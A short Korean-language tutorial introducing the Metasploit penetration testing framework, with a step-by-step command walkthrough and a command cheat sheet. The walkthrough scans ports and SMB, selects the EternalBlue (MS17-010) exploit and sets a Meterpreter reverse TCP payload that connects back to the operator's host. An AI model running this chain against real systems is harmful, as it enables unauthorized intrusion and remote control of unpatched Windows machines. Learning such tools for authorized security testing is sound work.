Metasploit Framework는 침투 테스트와 보안 평가를 위한 오픈소스 도구입니다. 주로 시스템의 취약점을 발견하고 테스트하는 데 사용되며, 보안 전문가들이 시스템의 보안 상태를 평가할 때 활용합니다.
1. Exploit (익스플로잇)
2. Payload (페이로드)
3. Module (모듈)
1단계: 정보 수집
use auxiliary/scanner/portscan/tcp
set RHOSTS [대상 IP]
set PORTS 1-1000
run
2단계: 취약점 스캔
use auxiliary/scanner/smb/smb_version
set RHOSTS [대상 IP]
run
3단계: 익스플로잇 선택
search [서비스명/취약점명]
use exploit/windows/smb/ms17_010_eternalblue
4단계: 페이로드 설정
set payload windows/x64/meterpreter/reverse_tcp
set LHOST [자신의 IP]
set LPORT [포트번호]
5단계: 대상 설정 및 실행
set RHOSTS [대상 IP]
check # 취약점 확인
exploit
help: 도움말 확인search: 모듈 검색use: 모듈 선택show options: 설정 옵션 확인set/unset: 값 설정/해제run/exploit: 실행back: 이전 단계로sessions: 세션 관리MSF는 반드시 합법적인 목적으로만 사용해야 합니다: